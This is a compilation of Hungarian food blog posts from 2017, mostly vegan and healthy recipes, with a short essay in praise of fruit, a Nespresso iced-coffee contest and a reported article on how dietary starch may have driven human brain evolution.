A padlizsánragu tényleg nagyon könnyen és gyorsan elkészíthető. A ragunál az i-re a pontot a főzés végén hozzáadott friss kapor és petrezselyem teszi fel. Tudom, egyesek ki nem állhatják a kapor ízét… nekik üzenem, hogy ez az étel nem működne autentikusan kapor nélkül. Ez egy egyszerű zöldségragu, amit bármikor megfőznék én is, de nem jutna eszembe, hogy kaprot tegyek bele. Amióta megismerkedtem ezzel az étellel, azóta keresem a lehetőséget a kapor számára, hogy melyik ételbe tehetem még bele, mert annyira rákattantam!
Szóval ez egy kötelezően elkészítendő nyári étel, csakis kaporral és petrezselyemmel!
Zöldségek pirítása…
Főzés végén hozzáadott friss zöldfűszerek…
Tálalva a török padlizsánragu gránátalmás, fűszeres bulgursalátával…
Török padlizsánragu gránátalmás fűszeres bulgursalátával (laktózmentes, vegán) Mentés Nyomtatás Előkészítési idő 30 perc Főzési idő 50 perc Teljes idő 1 óra 20 perc Könnyed, nyári török ételek, megfűszerezve minden jóval. Szerző: Zizi Recept típusa: saláta, főétel, köret Konyha: vegán Adag/mennyiség: 4 főre Hozzávalók Padlizsánraguhoz: 500 g padlizsán 400 g zöld kaliforniai paprika 400 g hámozott, darabolt paradicsom konzerv 200 g burgonya, meghámozva 3-4 gerezd fokhagyma, meghámozva 1 kis csokor kapor, felaprítva 1 kis csokor petrezselyem, felaprítva 4 evőkanál olívaolaj 3 evőkanál paradicsompüré (sűrített paradicsom) 2 teáskanál őrölt koriander 2 teáskanál nádcukor (opcionális) só, feketebors Bulgursalátához: 250 g aprószemű bulgur (török nevén ince vagy köftelik bulgur) 200 ml extra szűz olívaolaj 100 ml gránátalmalé (frissen facsarva vagy dobozos) 4 szál újhagyma, felaprítva 3 marék gránátalmamag 2 marék rukkola 1 evőkanál gránátalmaszirup 1 evőkanál török paprikakrém 1 evőkanál paradicsompüré (sűrített paradicsom) 1 teáskanál őrölt pirospaprika 1 teáskanál chili pehely (opcionális) 1 teáskanál őrölt római kömény só, feketebors 1-2 evőkanál frissen facsart citromlé Elkészítés Padlizsánragu: Vágjuk fel a burgonyát és a padlizsánt kis falatnyi nagyságú kockákra. Hevítsük fel az olívaolajat egy lábasban és pirítsuk meg rajta (kb. 8-10 perc alatt) a burgonyát és a padlizsánt, majd adjuk hozzá az őrölt koriandert és az apróra vágott fokhagymát. Mehet bele a paradicsom konzerv, a sűrített paradicsom, a nádcukor, végül pedig a kaliforniai paprika. Öntsük fel annyi vízzel (kb. 100-150 ml), hogy nagyjából elfedje a zöldségeket. Forraljuk fel, majd közepes lángon, fedő alatt főzzük 15-20 percig. Sózzuk, borsozzuk és keverjük bele az apróra vágott kapor és petrezselyem felét. Tálaláskor szórjuk meg a maradék zöldfűszerekkel. Ha nem csináljuk meg mellé a bulgurt, akkor kenyérrel lehet tunkolni a szaftját. Bulgursaláta: Tegyük a bulgurt egy tálba, öntsünk rá a bulgur másfélszeres mennyiségének megfelelő forrásban lévő vizet, majd takarjuk le és hagyjuk állni. Egy másik tálban keverjünk össze az olívaolajat, a fűszereket, a paradicsompürét és a paprikakrémet. Vágjuk fel a rukkolát, az újhagymát és tegyük félre. perc múlva öntsük az összekevert fűszeres olajat és a gránátalmalevet a bulgurhoz és gyúrjuk a kezünkkel 10 percig, mint egy tésztát. A kezünk melegétől és a nyomástól megnyílnak a bulgurszemek és beszippantanak minden illatos fűszert! Végül keverjük hozzá az újhagymát, a rukkolát, a gránátalmamagokat és öntsük rá a gránátalmaszirupot, valamint a citromlevet. Keverjük össze, de ekkor már nem kell gyúrni. Tálaláskor csorgassunk még rá néhány csepp citromlevet. 3.5.3226
Barackkrémes túrókocka
2017. július 14. Beautilicious
Évek óta az egészséges vonalat követem és eszem ágában sincs ezen változtatni. Nem jár semmiféle lemondással, sőt....! Édesszájú vagyok, de nem is kicsit :D, imádok nassolni. Az egyik kedvenc alapanyagom a túró. Nagyon finom és nagyon jó fehérjeforrás is. Ajánlom mindenkinek! És ha nem tudjátok, hogyan fogyasszátok, próbáljátok ki például ez isteni túrókockát. Hozzávalók - 125gr zabliszt - 25gr lenmagliszt - 50gr kókuszliszt - 70gr édesítő - fél csomag sütőpor - 100gr light sajtkrém - 200ml tej/ növényi tej/víz - 125gr sárgabarack - 3ek cukormentes baracklekvár - fél citrom leve - fahéj - 1 zacskó zselatin - 500gr túró - 2tojássárgája - édesítő ízlés szerint Így készítsd - A tésztához keverd össze a liszteket a sütőporral és a 70gr édesítővel - Add hozzá a krémsajtot és a folyadékot - Csomagold fóliába és tedd hűtőbe fél órára - A barackkrémhez turmixold össze a barackot a lekvárral, fél citrom levével és a fahéjjal - A zselatint old fel 4ek hideg vízben, majd add a krémhez és tedd hűtőbe - A túrókémhez a túrót, fél citrom levét és héját, az édesítőt és a 2 tojássárgáját keverd össze botmixerrel, hogy a túró ne legyen szemcsés. - Vedd ki a tésztát a hűtőből és lisztezett felületen nyújtsd ki jó vékonyra, majd helyezd tepsibe - Szurkodd meg villával, majd süsd 30 percig 180fokon - Vedd ki, majd öntsd bele a barackkrémet, majd rá a túrókrémet és süsd további 45percig
Málnás kókuszparfé
Ééééés… az első epres a második ribizlis után megérkezett a vegán fagyisorozat harmadik tagja, a kókuszos málna! Pár éve, egy másik receptemben olvashattátok, hogyan szerettem bele ebbe a két ízbe, akkor pudingot készítettem belőlük, és egészen más hozzávalókból. Szóval, a kókusz málnával továbbra is nagy kedvencem, és most a kánikulához szabva, jó hidegen érkezik. Hozzávalók egy tálkához: - 50 g kókuszkrém - 15 szem málna - 1 kávéskanál porcukor - A kókuszkrémet hűtőben hagyjuk ülepedni legalább egy éjszakán át. - Másnap nyissuk fel, és kanállal merjünk a “föléből”, és habverővel ezt verjük fel kemény habbá. Ha kész, a villával összenyomkodott málnát is keverjük hozzá. Édesítsük ízlés szerint. Használhatsz növényi szirupot, nádcukrot is, vagy ki is lehet hagyni ezt a lépést, és akkor egy igazán natúr ízű fagyi lesz a végeredmény. - Töltsük a krémet egy alacsony tálba, és tegyük a mélyhűtőbe. Hőmérséklettől függően 1-2 óra alatt megfagy. Krémesebb lesz, ha egy óra elteltével átkeverjük, majd visszatesszük tovább hűlni. - Egész málnákkal tálaljuk. Jó étvágyat! Elkészítési idő: 5 perc Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha ITT feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :) Nézd meg a legújabb Kertkonyha főzőtanfolyamokat: Kezdő Vegán Vegán MUST HAVE – a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood Kezdő Vegán Angol nyelven
Feketeribizlis maca golyók
2017. július 10. Vegán receptek Tőlünk Nektek
Annától kaptuk :)
Hozzávalók:
- Napraforgómag kb 10 dkg
- Tahini 3 ek
- 2 ek karob
- 4 ek maca por
- Puffasztott amarant
- 1 -1.5 ek kókuszzsír
- 1 ek szezámolaj
- 17-20 szem datolya
- Agavé szirup
- Kókuszreszelék
- Dió
Elkészítése:
A napraforgó magot puhára őröltem, hozzáadtam a datolyaszemeket és a kókuszzsírt, olajat és a tahinit. Együtt daráltam. Feketeribizlit ( de lehet áfonya is vagy málna , szeder például) adtam hozzá 3-4 marékkal, ezzel is könnyebben darálódott. Meghintettem a karobbal, maca porral és kézzel összedolgoztam. Lehet agavé vagy datolya sziruppal még édesíteni a masszát. Az száraz összetevőket és a gyümölcsöket akár külön is lehet darálni, hogy finom legyen és utána tálban mindennel összedolgozni.
A masszát hűtőbe tettem kb 40 percre. Utána a megformázott golyókat darált kókuszreszelékbe vagy őrölt dióba vagy amarántba forgattam. Nekem a kókuszreszelékes ízlik legjobban.
Tipp: Reszelt karobcsokival is el tudom képzelni... :)
Jó étvágyat!
csokis croissant
2017. július 10. Beautilicious
A balatoni kirándulásom előtt állok, de édességből sose lehet hiány. Reggelente mindig kígyózó sor áll a pékség előtt, ahonnan mindig árad az isteni pékség illat. A kiskori kedvencem a csokis croissant, amit mindig a lehel piacon könyörögtünk ki anyutól, mert nagyon imádtuk. Ezt hoztam most el nektek kicsit másképp. Hozzávalók - 200gr zabliszt - 100gr kókuszliszt - 100gr édesítő - 1 tasak sütőpor - 10gr útifű maghéj - 1 tojás sárgája - 300gr túró - annyi tejföl, hogy nyújtható legyen a tészta - 1 cékla - 100ml kávé - 1 marék datolya - 1 ek kakaópor Így készítsd - Tedd fel főni a megtisztított céklát - A tésztához keverd össze a liszteket, sütőport és édesítőt - Add hozzá a túrót, a tojás sárgáját, majd annyi tejfölt, amennyi szükséges (nekem 150gr kellett) - A krémhez turmixold össze a céklát a datolyával, kakaóporral és a kávéval - Válaszd négy részre a tésztát - Nyújtsd kör alakúra a tésztákat - Két tésztát kenj meg krémmel, majd egy- egy sima kört helyezz mindkettőre - Vágd 8 cikkre a köröket és tekerd fel őket, majd helyezd sütőpapírra - Előmelegített sütőben süsd 180fokon 30 percig
Mandula latte (tejeskávé mandulatejből)
2017. július 4. Gitta nyersétel blogja
Azoknak ajánlom ezt az italt, akik elsősorban a mandula ízére vágynak, megfűszerezve egy csepp kávéval. Lehűtve az igazi. mandula latte kakaóporral megszórva Hozzávalók: 4 pohár kávéhoz 15 dkg mandula 8 dl tisztított víz 1 evőkanál rizsszirup (vagy bármilyen természetes édesítőszer) 2 teáskanál bio arabica instant kávé + 1 dl víz Előkészítés: a mandulát áztassuk be kb 6 órára. A héját nem kell lehúzni. Ha blansírozott mandulánk van, azt nem kell beáztatni. Az 1 dl vizet felforraljuk és feloldjuk benne a kávét, szobahőmérsékletre hűtjük. Elkészítés: a mandulát turmixoljuk simára kevés vízzel. Épp csak annyi vizet tegyünk hozzá, hogy a turmixgép jól vigye, csak így tudjuk elérni, hogy a magokat feltörje a gép. Ha tejszerű, sima állagú a massza, akkor hozzáöntjük a többi vizet is, még egyszer pörgetünk rajta egyet a géppel. Szűrőzsákon átszűrjük, és a leszűrt levet visszatöltjük a turmixgépbe. Hozzáadjuk az édesítőszert és a forró vízben feloldott kávét. Még egyszer átturmixoljuk. Ha sokáig pörgetjük nagy teljesítményű turmixgéppel, akkor azt vesszük észre, hogy a súrlódástól az ital felmelegszik. Vigyázzunk az enzimvédő hőmérsékletre (45 C fok), ennél tovább ne hagyjuk melegedni a tejet. De egy langyos mandulatejes kávé... a nap bármely szakában jól fog esni. A másik lehetőség, hogy ezt az italt jól lehűtjük, és hidegen tálaljuk. Nyáron jégkockával, szívószállal finom üdítő ital. A visszamaradt pépet sokoldalúan fel tudjuk használni, hamarosan jön a pizza alap... Ha nem használjuk fel azonnal, akkor tegyük nylon zacskóba, írjuk rá a dátumot, és tegyük be a fagyasztóba. Kiolvasztva bármikor felhasználható mandulasajt, sajtkrém, vagy pizza alap készítéséhez.
A gyümölcs a természet ajándéka
2017. június 30. Gitta nyersétel blogja
Ez a bejegyzés nem szól másról, csak a gyümölcsökről. Vannak olyan táplálkozási irányzatok, amelyek nem javasolják a gyümölcsök fogyasztását. Lehetnek olyan esetek, amikor egészségügyi problémák miatt nem kerülhet gyümölcs a tányérra, de minden egyéb esetben ezt javasolni szerintem balgaság. A gyümölcs az egyetlen olyan dolog a földön, ami azért van, hogy megegyük. Azért terem, hogy élelem legyen. A fák és a cserjék nem képesek a helyváltoztatásra, gyökereikkel a földhöz kapcsolódnak. Évente megérlelik a magjaikat, amit ugye azért tesznek, hogy a faj fennmaradjon, ezzel szaporodnak. A gravitáció csak abban segíti őket, hogy a mag a földre hulljon, de mivel annak nem sok értelme lenne, hogy az összes cseresznyefa egy kupacban nőjön... valahogy gondoskodnia kell arról, hogy a magok messze földre is eljussanak. A természet erre azt találta ki, hogy ehhez a feladathoz igénybe veszi a helyváltoztatásra képes élőlényeket, négylábúakat vagy madarakat... de persze ezt ők sem teszik ingyen. A mag köré édes, szaftos, illatos és színes gyümölcsöt talált ki! Ha megérik a mag, édes és kívánatos lesz a gyümölcs is, leesik a fáról, az állatok (és persze az ember is) jókat lakmározik belőlük. A mag is úgy van kitalálva, hogy ne lehessen megemészteni, így 1-2 nap múlva néhány kilométerrel odébb trágyázott környezetben, az anyaföldbe visszajutva lesz esélye az új élethez. Ki van ez találva. Igen, a gyümölcsök tartalmaznak cukrot. De óriási különbség van a gyümölccsel elfogyasztott cukor és egy pohár limonádéban feloldott kristálycukor (vagy a habos sütikről ne is beszéljünk) között. A gyümölcs tartalmaz még rostokat, amitől a cukor felszívódása sokkal lassabb lesz, nem hirtelen emeli meg a vércukor szintet, mint a cukros üdítő. A gyümölcs rengeteg vitamint, antioxidánst és más ásványi anyagot is tartalmaz, amire a szervezetünknek szüksége van. A cukros üdítő jó esetben csak energia, rossz esetben tartósítószer és színezék is bejut vele :( Gyümölcsből csak annyit tudsz enni, amennyit a gyomrod képes befogadni. Van korlátja... az édes cukros ételekből sokkal többet meg tudunk enni, mint amennyire szükségünk van, így könnyen túlesszük magunkat, és jön az elhízás... bünti a cukros falatokért... A gyümölcs elfogyasztásához nincs szükség semmire, főzésre, tányérra, semmilyen ételkészítési eljárásra. (gondoljatok itt a többi növényre... pl. a gyökér zöldségeket meg kell mosni, hámozni, a gabonákat aratni, főzni, sütni, magokat magozni, csíráztatni, stb... ) A gyümölcs finom, színes, illatos... de ezt úgyis tudjátok. Itt a nyár, most nevezzetek ki egy napot a héten, és egyetek csak gyümölcsöt... dinnyét... barackot... látni fogjátok, mennyi energiát ad :) Tartsatok gyümölcsnapokat :) Nincs recept, csak egyétek a finom gyümölcsöket magukban, jóízűen...
Mézes tallér
Mókuslekvár blogján mézes keksz néven fut, de az enyémre a tallér jobban illik, mivel a Tefálos sütőben nem lett olyan gyönyörű, mint a Cloer kekszsütőben. (No ez is olyan eszköz, amire vágyik az ember, aztán ha hozzájut, csak rakosgatja a pici konyhában az első pár hét lelkesedése után.. Vagy csak vigasztalom magam a gondolattal? :) ) Egyébként Békésen Bacsó néni mézes tallérjához hasonló receptet kerestem. Gyermekkori emlékeim vannak egy viszonylag kemény, pár mili vastag tésztáról, rózsa formájú középpel. Sajnos Bacsó néni nincs már, csak találgatni tudok. Ez hasonlít, de nem az, viszont finom lett, csak még nekem se édes. :) Hozzávalók: 75 g méz 40 ml víz 40 g gyümölcscukor (no ezt növelem a duplájára legközelebb) 250 g tk tönkölybúza liszt 35 g biomargarin 1 tojás 1 kk szódabikarbóna pici fahéj A mézet óvatosan felolvasztjuk, belekeverjük a cukrot, a margarint, majd a vizet. Hozzáütjük a tojás, beleszórjuk a szódabikarbónás, fahéjas lisztet, és egyneművé dolgozzuk. Egy éjszakára zárt dobozban a hűtőbe tesszük. Másnap az ostyasütőt előmelegítjük, a tésztát amilyen vékonyra csak lehet kinyújtjuk, vágjuk, és pár perc alatt kisütjük.
Narancsos túrófánk
2017. június 23. Beautilicious
Könnyed fehérjében gazdag édesség. Ennél nagyobb jutalom nincs is egy kiadós edzés után. Hozzávalók - 400gr túró - 2 narancs héja és leve - fél citrom héja és leve - 100gr kókuszliszt - 100gr zabliszt - 15 gr útifűmaghéj - 60gr édesítő - 2 tojás - fél csomag sütőpor Így készítsd - A túrót keverd össze a tojással és reszeld bele a gyümölcsök héját - Facsard ki a gyümölcsöket, majd öntsd hozzá - Keverd össze egy másik tálba a többi hozzávalót - Öntsd hozzá a túrós keveréket - Keverd össze alaposan - Formázz belőle golyókat, majd süsd ki 170 fokon 20perc alatt
Banános jeges kávé smoothie (laktózmentes, cukormentes, vegán) + Nespresso nyereményjáték
2017. június 22. Zizi kalandjai
Én a kávét az íze miatt iszom… inkább olyan szertartás számomra az, ha iszom egy csésze/bögre kávét, nem pedig azért történik, hogy felébresszem magam. Ezért kávét nem is iszom reggel és mindennap sem, csak, ha megkívánom. Napszakot tekintve pedig ez többnyire ebéd után szokott megtörténni, amikor érzem, hogy most jól esne.
Reggelire egy nagy pohár vizet szoktam inni és egy nagy pohár gyümölcsös turmixot. Én ezektől ébredek fel. De mi van akkor, ha valakinek nagyon fontos a reggeli kávé, de azt szeretné egy egészségesebb formába önteni úgy, hogy az még laktató is legyen? Ha más reggelire nincs is időtök, legalább egy banános jeges kávéra azért legyen ezen a nyáron! Ez a jeges kávé villámgyorsan elkészíthető, ha előző este bedobjátok az érett banánokat a mélyhűtőbe. Reggel csak elkészítitek a kávét hozzá, beleöntötök mindent a turmixgépbe és már kész is a nyári melegben igen jól eső heves-jeges banános-kávés-kókuszos krémes italotok. De ez az ital lehet a délutáni ébresztőtök is, amikor a kávé és banán cukortartalma segít felébreszteni a tikkasztó hőségben, meg lehűteni is egyben. Az ital laktóz- és gluténmentes, vegán és még cukormentes is, ugyanis a banán édesíti csak, ez adja a krémességét az italnak a kókusztejen felül. Egyszerűen nincs kifogás, irány a konyha, dobjátok be a mélyhűtőbe a banánokat, hogy minél előbb kipróbálhassátok ezt a finomságot!
A Nespresso két limitált kiadású, a mediterrán életstílus által inspirált őrleményt mutat be idén nyáron, amelyeket kifejezetten jegeskávék készítéséhez terveztek: az Intenso on Ice-t és Leggero on Ice-t. Az Intenso on Ice egy merészen telt kávé gabonás és kakaós jegyekkel, intenzív, pörkölt lecsengéssel. A Leggero on Ice feketén fogyasztva gyömölcsös, citrusos jegyeket mutat, hosszú lecsengéssel és lágy textúrával.
A Nespresso megkeresésének köszönhetően lehetőségem nyílt mindkét fajta limitált szériás kávét kipróbálni és az Instenso on Ice kapszulával pedig egy kicsit kísérletezni, amelynek eredménye ez a jeges ital lett. A Nespresso által a bloggerek között hirdetett versenyben a legjobb jeges kávé ital receptjét keresik. Ha úgy érzitek, ez a jegeskávé viszi a pálmát, akkor szavazhattok rá(m) a Nespresso Facebook oldalán itt (link hamarosan jön!!!), június 23 és 26 között.
NYEREMÉNYJÁTÉK!!! Ha pedig mindenféle izgalmas dolgot szeretnétek nyerni, akkor játsszatok ti is! Fotózd le kedvenc Nespresso kávéőrleményedből készült jegeskávéd a kapszulával együtt, használd a #NespressoPillanat hashtaget, és oszd meg a Nespresso-val Instagram-on, hogy te legyél a szerencsés nyertes, aki Nespresso jegeskávé ajándékcsomagot nyer!”
Részletek:
A nyereményjáték időtartama: 2017.06.12 10:00 – 2017.07.20 10:00.
Feladat: #NespressoPillanat hashtaggel posztolni Instagramra úgy jegeskávé képet, hogy 1 Nespresso kapszula látszódik rajta.
Nyeremény: 1db Iced Coffee csomag (Limited Edition Travel Mug termobögre, PURE Recipe pohár szett, Aeroccino 4 tejhabosító).
A játékról még többet és a játékszabályzatot itt olvashatjátok el!
Banános jeges kávé smoothie (laktózmentes, cukormentes, vegán) Mentés Nyomtatás Előkészítési idő 5 óra Főzési idő 5 perc Teljes idő 5 óra 5 perc Hűsítő jeges kávés turmix egészségesen felturbózva. Szerző: Zizi Recept típusa: ital, turmix, reggeli Konyha: vegán, gluténmentes Adag/mennyiség: 1 főre Hozzávalók 2 db érett banán 200 ml sűrű kókusztej 110 ml kávé (Nespresso Intenso on Ice kapszulából készítve) csipet fahéj kókuszchips, kakaóbabtöret (opcionális) a tálaláshoz Elkészítés A banánokat hámozzuk meg, törjük két-három darabba és egy tasakban/dobozban tegyük a fagyasztóba 5-6 órára (vagy egy éjszakára), amíg teljesen megfagynak. Tegyük a kókuszchipset száraz serpenyőbe, és pirítsuk meg 4-5 perc alatt. Egy pohárba tegyünk 3 nagy méretű jégkockát, és főzzük rá a kávét, hogy lehűljön. Tegyük a fagyasztott banánokat, kókusztejet, fahéjat és hűtött kávét turmixgépbe, és turmixoljuk krémesre. Tálaljuk pirított kókuszchipsszel megszórva. Jegyzetek Kb. 300 ml mennyiségű ital készül az alapanyagokból. 3.5.3226
“Paleolit” étrend volt-e a paleolitikumban? – Új kutatások az emberi agy növekedéséről
A keményítőben gazdag növényi táplálékok is kellettek az emberi agy növekedéséhez a régészetileg paleolitikumnak (őskőkornak), őslénytanilag pleisztocénnak nevezett, több mint 2 millió évet felölelő földtörténeti korban. A Chicagóban negyedévenként kiadott Quarterly Review of Biology Barcelonában, Sydneyben és Londonban dolgozó kutatók tanulmányát közölte 2015-ben. A szerzők amellett érvelnek, hogy a keményítőben gazdag gumók, karógyökerek és egyéb, tápanyag-raktározásra módosult növényi részek főzése és fogyasztása volt az egyik fő tényező, ami előrelendítette az emberi agy evolúcióját, növekedését az elmúlt 1-2 millió évben. Ez a tétel ellentmond annak a sokak által hangoztatott - és a paleo étrend hívei között különösen népszerű - nézetnek, mely szerint az emberi agy méretének mintegy 800 ezer évvel ezelőtt bekövetkezett jelentős növekedése döntően a rendszeres húsfogyasztás elterjedésének lenne köszönhető. A szénhidrátban gazdag gabona- és zöldségféléket kerülő paleolit étrend az elhízás és más, táplálkozással összefüggő anyagcsere-betegségek népbetegséggé válása miatt kerülhetett az érdeklődés homlokterébe a világ sok országában - nyilatkozta a tanulmány egyik szerzője, Jennie Brand-Miller, a sydney-i Charles Perkins Központ professzora. ,,Egészen mostanáig az állati eredetű fehérjéken volt a hangsúly az emberi agy növekedésével kapcsolatban. A szénhidrátokkal, ezen belül a keményítőben gazdag növényi részekkel szinte senki sem törődött. Feltevésünk szerint azonban a táplálékkal felvett szénhidrátok is nélkülözhetetlenek voltak ahhoz, hogy az emberi agy elérje mostani méretét. Ha a paleolitikum embere paleo étrenden élt volna, nehezen fejlődhetett volna a mai emberré. A szénhidrátok és az agy A probléma abból ered, hogy a szénhidrátban szegény, paleo jellegű étrend nem szolgáltatott volna elegendő glükózt (szőlőcukrot) a mai emberre jellemző nagyméretű agy kifejlődéséhez és működéséhez. Az agy számára ugyanis szinte az egyetlen hasznosítható energiaforrás a glükóz, és az emberi szervezet teljes energiaszükségletének akár a negyedét, a vérben keringő glükóznak akár a 60%-át az agy használja fel. Emellett az izmok is sok glükózt égetnek el, különösen futás közben. Ahogy a mai embernek (Homo sapiens) folyamatos glükózutánpótlásra van szüksége ahhoz, hogy a vércukorszintje mérsékelt ingadozásokkal állandó legyen, úgy a pleisztocénban élt őseink (pl. a Homo habilis, Homo erectus, Homo neanderthalensis) számára is létkérdés volt, hogy vagy közvetlenül a táplálékaikból, vagy közvetve, táplálékaik átalakításával nap mint nap elegendő glükózhoz jussanak. Glükóz legegyszerűbben a táplálék szénhidrátjaiból nyerhető: kisebb mennyiségben a cukrokból (pl. a gyümölcsökben lévő glükózból és fruktózból), nagyobb mennyiségben a keményítőből, ami nem más, mint polimerizált glükóz. (A növényi sejtfalakat alkotó cellulóz is glükózmolekulák polimerje, de az emberi szervezet számára nem lebontható.) Szükség esetén az izmok és a máj glikogénraktárai is mozgósíthatók, ezeket a raktárakat azonban, ha kimerültek, újra fel kell tölteni. Ha a táplálék nem tartalmaz szénhidrátokat, a máj a glükoneogenezis néven ismert biokémiai útvonalon képes glükózt termelni a táplálékkal fölvett fehérjék és zsírok építőelemeiből. Éhezés idején a glükoneogenezis kiindulási anyagai a szervezet zsírtartalékai, végső esetben a szöveti fehérjék. A glükoneogenezis ilyenkor önmagában nem képes ellátni elegendő glükózzal az idegsejteket, azok a nagymértékű zsírbontás melléktermékeit, a ketonokat kezdik használni. A ketonok az agy energiaszükségletének kb. 80%-át is fedezhetik, de minimálisan napi 30-50 gramm szénhidrát bevitelére az agynak még így is szüksége van. A ketonok felszaporodásának megelőzéséhez felnőtteknek legalább napi 50-100 gramm hasznosítható szénhidrátot kell magukhoz venniük, a dietetikai ajánlások pedig ennél valamivel feljebb húzzák meg a határt: 3-4 évesnél idősebb gyermekek és felnőttek számára napi 150 grammnál, a kicsik számára pedig a felvett táplálék energiatartalmának egyharmadánál. Párhuzamos biológiai és kulturális evolúció Az ember testfelépítését érintő fontos evolúciós változások közül több is a Homo erectus faj megjelenéséhez köthető. Ilyen a testsúly és a testmagasság növekedése, a fogak méretének és a belek hosszának csökkenése, a koponyatérfogat kétszeres növekedése a korai pleisztocén (2 millió évvel ezelőtt) és a középső pleisztocén (500 ezer évvel ezelőtt) közötti időszakban. Mindez együtt járt az ősember étrendjének megváltozásával: a nagy térfogatú, kis energiatartalmú táplálékokat kisebb térfogatúak és nagyobb energiatartalmúak váltották fel. Az 1,8 millió évvel ezelőtt élt őseink tápcsatornája nem sokban térhetett el a mienktől, koponyatérfogatuk 600 cm3 körül lehetett. A koponya térfogatának növekedése mintegy 800 ezer évvel ezelőtt gyorsulhatott fel, talán azért, mert akkoriban szokott rá az ősember a főzésre. A nagyobb testméret növelte a táplálékszükségletet, ámbár a táplálékszerző képességet is javította. Az enkefalizációt - az agy méretének az egész test méretéhez viszonyított növekedését - étrendi, illetve más testfelépítésbeli változásokra vezetik vissza. Az ember az egyetlen faj, amelyik megtanulta szabályozottan használni a tüzet, és módjában áll főzve, sütve fogyasztani a táplálékait. A főzés elsajátítása fordulópont lehetett az emberi evolúcióban. Tűzrakásra utaló régészeti leletek már 1,6 millió évvel ezelőttről is előkerültek, de egyértelmű bizonyítékaink arra, hogy az ember főzésre használta a tüzet, csak sokkal későbbről, 300-400 ezer évvel ezelőttről vannak. Az időbeli bizonytalanság ellenére úgy tűnik, elég régóta birtokoljuk a főzés tudományát ahhoz, hogy számolhassunk e kulturális újítás biológiai adaptációs következményeivel: a fogak méretének csökkenésével, a nyers, rostos táplálékok nehezebb emésztésével, a csecsemők korábbi elválasztásával, akár a szülések közötti időszak rövidülésével is. Legfőbb étrendi glükózforrásunk, a keményítő az őskőkori ember számára különféle gumók, gyökerek, magvak, egyes gyümölcsök és diófélék formájában bőségesen, az év nagy részében rendelkezésre állt, de csak a főzés elterjedésével váltak ezek a szénhidrátok jó hatásfokkal emészthetőkké, hasznosíthatókká. Mit mutatnak a keményítőbontó enzimek génjei? Az emberi szervezet kétféle alfa-amiláz enzimet termel a keményítő lebontására. az egyik a nyálban található, a másik pedig a hasnyálmirigy emésztőnedvében, a hasnyálban, amely a vékonybélben fejti ki a hatását. A nyálban lévő amiláz hatására már a szájüregben megkezdődik a keményítő emésztése, végül a vékonybélben a hasnyál amilázának és más enzimeknek a hatására bomlanak le a keményítő óriásmolekulái a vérbe felszívódó glükózzá. A felnőttek döntően a hasnyálban lévő amilázzal emésztik meg a keményítőt, a csecsemők és a kisgyermekek hasnyálának alfa-amiláz-aktivitása azonban kicsi, ezért e korcsoportban a keményítőemésztés jelentős részben, mintegy 50%-ban a nyál amilázától függ. A mai ember génkészletében általában hat példányban van jelen a nyál amiláz enzimjét kódoló gén, miközben a többi főemlős genomjában ebből a génből átlagosan két példány található. Nem tudjuk pontosan, hogy őseink mikor tettek szert az új génkópiákra, de a génkópiák összehasonlítása arra utal, hogy valószínűleg az utolsó egymillió évben - tehát elképzelhető, hogy a főzés elterjedésével egy időben. A több génkópia nagyobb enzimaktivitással járhatott együtt, és a nyál nagyobb keményítőbontó aktivitása evolúciós előnyt jelenthetett a keményítőben gazdag növényi részekkel táplálkozó embereknek, különösen kisgyermekkorban, amikor a hasnyálmirigy alig termel amilázt, és amikor a gyors ütemben növekvő agy igényli a sok glükózt. Erre az eredményre utalt a tanulmány első szerzője, a barcelonai Karen Hardy: ,,Nem vonjuk kétségbe, hogy az enkefalizációban a húsevésnek is lehetett szerepe, de úgy véljük, az agyunk ilyen mérvű növekedésére a szénhidrátokból nyert energia nélkül kisebb lett volna az esély. A főzés is az agy korai fejlődését elősegítő tényezők közé sorolható, ám arról sem feledkezhetünk meg, hogy a szénhidrátban gazdag táplálékok főzése azért lehetett biológiailag kifizetődő, mert őseink szervezetében megvoltak a szénhidrátok feldolgozásához szükséges enzimek. Ahogy megvannak ezek az enzimek a mai ember szervezetében is, mert anatómiai, élettani, biokémiai adottságainkban evolúciós közelmúltunk többnyire szénhidrátban gazdag étrendi kínálatára hangolódtunk rá. Korszerű volt-e a paleolitikumban a paleolit étrend? Garai Attila The post “Paleolit” étrend volt-e a paleolitikumban? – Új kutatások az emberi agy növekedéséről appeared first on VegaNinja.
Barackos-túrós csiga
2017. június 17. Beautilicious
Nálunk finomságokból sosincs hiány, sóvárgásról szó sincs. Kellemesen édes, könnyed finomság csupa egészséges alapanyagból. Egy ilyen finomság után az edzés is sokkal lendületesebben fog menni. Ha szeretnél finomat és mégis egészségeset enni, ezt próbáld ki! Hozzávalók - 3 sárgarépa - 20gr vaj - 250gr zabliszt - 30gr darált dió - 15gr útifű maghéj - fél csomag sütőpor - 60gr édesítő + 4ek - 300gr túró - fahéj - 2 sárgabarack Így készítsd - A répát a vajjal együtt pürésítsd - A lisztet, útifű maghéjat, 60gr édesítőt, darált diót, sütőport és fahéjat keverd össze - Ehhez add hozzá a répapürét - Alaposan kéred össze, majd egy fél órát hagy állni - A töltelékhez törd át a túrót - Adj hozzá fahéjat és 4ek édesítőt - Vágd fel a barackot és add a túrós töltelékhez - Nyújtsd ki a tésztát, majd töltsd meg és tekerd fel - Vágd ujjnyi vastagságúra, majd helyezd sütőpapírral bélelt tepsibe - Süsd 180 fokon 25percig
Zabkása reggelire
2017. június 14. Gitta nyersétel blogja
A zabot természetesen nem főzzük meg, de hogy felpuhuljon, hogy az enzimek feléledjenek benne jól beáztatjuk. És hogy legyen elég ideje ázni, már előző este szép gondosan elvégezzük ezt a műveletet. Lehet rögtön abba a tányérba tenni, amiben el fogjuk másnap fogyasztani, vagy ha magunkkal visszük munkába, akkor akár egy befőttes üvegbe is. Lehet a zabpehely mellé még más magokat is tenni, pl. mandulát, diót, chia magot, kókuszchipszet, kinek mi van otthon, és lehet aszalt gyümölcsöket is, datolyát, aszalt szilvát, goji bogyót. Lehet édesíteni szirupokkal, mézzel, datolya sziruppal, stb... Ez itt most egy lehetséges összeállítás, de bátran lehet variálni. Hozzávalók: 4-5 evőkanál zabpehely 3 evőkanál goji bogyó 1/2 banán karikára vágva 4 evőkanál chia mag egy marék kesudió egy marék aszalt meggy kb 2 dl mandulatej (vagy más növényi tej, lehetőleg frissen készített pl itt találod hogyan készíts mandulatejet) vagy amennyi belefér az 